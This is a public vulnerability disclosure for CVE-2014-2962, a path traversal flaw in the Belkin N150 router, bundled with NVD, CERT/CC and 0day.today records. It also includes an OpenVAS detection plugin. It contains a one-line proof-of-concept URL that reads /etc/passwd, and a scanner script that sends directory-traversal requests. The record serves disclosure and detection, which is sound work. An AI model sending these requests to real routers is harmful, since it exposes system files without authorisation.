# Title: Path Traversal Vulnerability
# Product: Belkin Router N150
# Author: Rahul Pratap Singh
# Website: https://0x62626262.wordpress.com
# Contact:
Linkedin: https://in.linkedin.com/in/rahulpratapsingh94
Twitter: @0x62626262
# Vendor Homepage: http://www.belkin.com
# Firmware Tested: 1.00.08, 1.00.09
# CVE: 2014-2962
Description:
Belkin N150 wireless router firmware versions 1.00.07 and earlier contain a
path traversal vulnerability through the built-in web interface. The
webproc cgi
module accepts a getpage parameter which takes an unrestricted file path as
input. The web server runs with root privileges by default, allowing a
malicious attacker to read any file on the system.
A patch was released by Belkin but that is still vulnerable.
POC:
http://192.168.2.1/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo
#root:x:0:0:root:/root:/bin/bash root:x:0:0:root:/root:/bin/sh
#tw:x:504:504::/home/tw:/bin/bash #tw:x:504:504::/home/tw:/bin/msh
Ref:
https://www.kb.cert.org/vuls/id/774788
https://0x62626262.wordpress.com/category/full-disclosure/
{"id": "EDB-ID:38488", "hash": "c823835f694483c61a8c882f6c84bfc9", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Belkin Router N150 1.00.08, 1.00.09 - Path Traversal Vulnerability", "description": "Belkin Router N150 1.00.08, 1.00.09 - Path Traversal Vulnerability. CVE-2014-2962. Webapps exploit for hardware platform", "published": "2015-10-19T00:00:00", "modified": "2015-10-19T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/38488/", "reporter": "Rahul Pratap Singh", "references": [], "cvelist": ["CVE-2014-2962"], "lastseen": "2016-02-04T08:12:18", "history": [], "viewCount": 10, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2016-02-04T08:12:18"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-2962"]}, {"type": "zdt", "idList": ["1337DAY-ID-24458"]}, {"type": "cert", "idList": ["VU:774788"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310806147"]}], "modified": "2016-02-04T08:12:18"}, "vulnersScore": 5.7}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/38488/", "sourceData": "# Title: Path Traversal Vulnerability\r\n# Product: Belkin Router N150\r\n# Author: Rahul Pratap Singh\r\n# Website: https://0x62626262.wordpress.com\r\n# Contact:\r\n Linkedin: https://in.linkedin.com/in/rahulpratapsingh94\r\n Twitter: @0x62626262\r\n# Vendor Homepage: http://www.belkin.com\r\n# Firmware Tested: 1.00.08, 1.00.09\r\n# CVE: 2014-2962\r\n\r\nDescription:\r\nBelkin N150 wireless router firmware versions 1.00.07 and earlier contain a\r\npath traversal vulnerability through the built-in web interface. The\r\nwebproc cgi\r\nmodule accepts a getpage parameter which takes an unrestricted file path as\r\ninput. The web server runs with root privileges by default, allowing a\r\nmalicious attacker to read any file on the system.\r\n\r\nA patch was released by Belkin but that is still vulnerable.\r\n\r\nPOC:\r\nhttp://192.168.2.1/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo\r\n#root:x:0:0:root:/root:/bin/bash root:x:0:0:root:/root:/bin/sh\r\n#tw:x:504:504::/home/tw:/bin/bash #tw:x:504:504::/home/tw:/bin/msh\r\n\r\nRef:\r\nhttps://www.kb.cert.org/vuls/id/774788\r\nhttps://0x62626262.wordpress.com/category/full-disclosure/\r\n", "osvdbidlist": ["108238"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:13:45", "bulletinFamily": "NVD", "description": "Absolute path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter.", "modified": "2016-12-24T02:59:00", "id": "CVE-2014-2962", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2962", "published": "2014-06-19T10:50:00", "title": "CVE-2014-2962", "type": "cve", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}], "cert": [{"lastseen": "2019-05-29T20:42:22", "bulletinFamily": "info", "description": "### Overview \n\nBelkin N150 wireless routers contain a path traversal vulnerability.\n\n### Description \n\n[**CWE-22**](<http://cwe.mitre.org/data/definitions/22.html>)**: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')** \\- CVE-2014-2962\n\nBelkin N150 wireless router firmware versions 1.00.07 and earlier contain a path traversal vulnerability through the built-in web interface. The `webproc` cgi module accepts a `getpage` parameter which takes an unrestricted file path as input. The web server runs with root privileges by default, allowing a malicious attacker to read any file on the system. \n \n--- \n \n### Impact \n\nAn unauthenticated attacker that is connected to the router's LAN may be able to read critical system files on the router. \n \n--- \n \n### Solution \n\nThe CERT/CC is currently unaware of a practical solution to this problem. The vendor had previously indicated that the vulnerability was resolved in [firmware version 1.00.08](<http://cache-www.belkin.com/support/dl/F9K1009_WW_1.00.08.bin>); however, recent reports indicate that firmware version 1.00.08 failed to address the issue and that version 1.00.09 is vulnerable as well.[](<http://cache-www.belkin.com/support/dl/F9K1009_WW_1.00.08.bin>) Users should consider the following workaround: \n \n--- \n \n**Restrict Access** \n \nEnsure that appropriate firewall rules are in place to restrict access to port 80/tcp from external untrusted sources. \n \n--- \n \n### Vendor Information\n\n774788\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ Belkin, Inc.\n\nNotified: March 10, 2014 Updated: June 09, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 7.8 | AV:N/AC:L/Au:N/C:C/I:--/A:-- \nTemporal | 6.1 | E:POC/RL:OF/RC:C \nEnvironmental | 4.6 | CDP:ND/TD:M/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <http://www.belkin.com/us/support-article?articleNum=109400>\n * <http://cwe.mitre.org/data/definitions/22.html>\n\n### Acknowledgements\n\nThanks to Aditya Lad for originally reporting this vulnerability. Thanks to Rahul Pratap Singh for identifying the issue in version 1.00.09 and for testing 1.00.08. \n\nThis document was written by Todd Lewellen. \n\n### Other Information\n\n**CVE IDs:** | [CVE-2014-2962](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2962>) \n---|--- \n**Date Public:** | 2014-06-18 \n**Date First Published:** | 2014-06-18 \n**Date Last Updated: ** | 2015-09-29 18:49 UTC \n**Document Revision: ** | 18 \n", "modified": "2015-09-29T18:49:00", "published": "2014-06-18T00:00:00", "id": "VU:774788", "href": "https://www.kb.cert.org/vuls/id/774788", "type": "cert", "title": "Belkin N150 path traversal vulnerability", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}], "zdt": [{"lastseen": "2018-03-02T01:43:28", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category web applications", "modified": "2015-10-19T00:00:00", "published": "2015-10-19T00:00:00", "id": "1337DAY-ID-24458", "href": "https://0day.today/exploit/description/24458", "type": "zdt", "title": "Belkin Router N150 1.00.08, 1.00.09 - Path Traversal Vulnerability", "sourceData": "# Title: Path Traversal Vulnerability\r\n# Product: Belkin Router N150\r\n# Author: Rahul Pratap Singh\r\n# Website: https://0x62626262.wordpress.com\r\n# Contact:\r\n Linkedin: https://in.linkedin.com/in/rahulpratapsingh94\r\n Twitter: @0x62626262\r\n# Vendor Homepage: http://www.belkin.com\r\n# Firmware Tested: 1.00.08, 1.00.09\r\n# CVE: 2014-2962\r\n \r\nDescription:\r\nBelkin N150 wireless router firmware versions 1.00.07 and earlier contain a\r\npath traversal vulnerability through the built-in web interface. The\r\nwebproc cgi\r\nmodule accepts a getpage parameter which takes an unrestricted file path as\r\ninput. The web server runs with root privileges by default, allowing a\r\nmalicious attacker to read any file on the system.\r\n \r\nA patch was released by Belkin but that is still vulnerable.\r\n \r\nPOC:\r\nhttp://192.168.2.1/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo\r\n#root:x:0:0:root:/root:/bin/bash root:x:0:0:root:/root:/bin/sh\r\n#tw:x:504:504::/home/tw:/bin/bash #tw:x:504:504::/home/tw:/bin/msh\r\n \r\nRef:\r\nhttps://www.kb.cert.org/vuls/id/774788\r\nhttps://0x62626262.wordpress.com/category/full-disclosure/\n\n# 0day.today [2018-03-01] #", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/24458"}], "openvas": [{"lastseen": "2019-05-29T18:36:39", "bulletinFamily": "scanner", "description": "This host is running Belkin Router and is\n prone to directory traversal vulnerability.", "modified": "2019-02-08T00:00:00", "published": "2015-10-29T00:00:00", "id": "OPENVAS:1361412562310806147", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806147", "title": "Belkin Router Directory Traversal Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_belkin_router_dir_trav_vuln.nasl 13543 2019-02-08 14:43:51Z cfischer $\n#\n# Belkin Router Directory Traversal Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806147\");\n script_version(\"$Revision: 13543 $\");\n script_cve_id(\"CVE-2014-2962\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-02-08 15:43:51 +0100 (Fri, 08 Feb 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-10-29 12:12:25 +0530 (Thu, 29 Oct 2015)\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_name(\"Belkin Router Directory Traversal Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is running Belkin Router and is\n prone to directory traversal vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted request via HTTP GET and\n check whether it is able to read the configuration file or not.\");\n\n script_tag(name:\"insight\", value:\"The flaw allows unauthenticated attackers\n to download arbitrary files through directory traversal.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to read arbitrary files on the target system.\");\n\n script_tag(name:\"affected\", value:\"Belkin N300/150 WiFi N Router, other firmware may also be affected.\");\n\n script_tag(name:\"solution\", value:\"As a workaround ensure that appropriate\n firewall rules are in place to restrict access to port 80/tcp from external\n untrusted sources.\");\n\n script_tag(name:\"solution_type\", value:\"Workaround\");\n\n script_xref(name:\"URL\", value:\"http://www.kb.cert.org/vuls/id/774788\");\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/38488\");\n script_xref(name:\"URL\", value:\"http://www.belkin.com/us/support-article?articleNum=109400\");\n script_xref(name:\"URL\", value:\"https://packetstormsecurity.com/files/133913/belkin-disclose.txt\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_get_http_banner.nasl\", \"os_detection.nasl\");\n script_require_keys(\"Host/runs_unixoide\");\n script_mandatory_keys(\"mini_httpd/banner\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nasport = get_http_port(default:80);\n\nbanner = get_http_banner(port: asport);\nif(!banner){\n exit(0);\n}\n\nfiles = traversal_files(\"linux\");\n\nif(banner =~ 'Server: mini_httpd')\n{\n\n foreach pattern(keys(files)) {\n\n file = files[pattern];\n\n url = \"/cgi-bin/webproc?getpage=../../../../../../../../../../\" + file + \"&\" +\n \"var:getpage=html/index.html&var:language=en_us&var:oldpage=(null)&\" +\n \"var:page=login\";\n\n if(http_vuln_check(port:asport, url:url, pattern:pattern))\n {\n report = report_vuln_url(port:asport, url:url);\n security_message(port:asport, data:report);\n exit(0);\n }\n }\n}\n\nexit(99);", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}]}
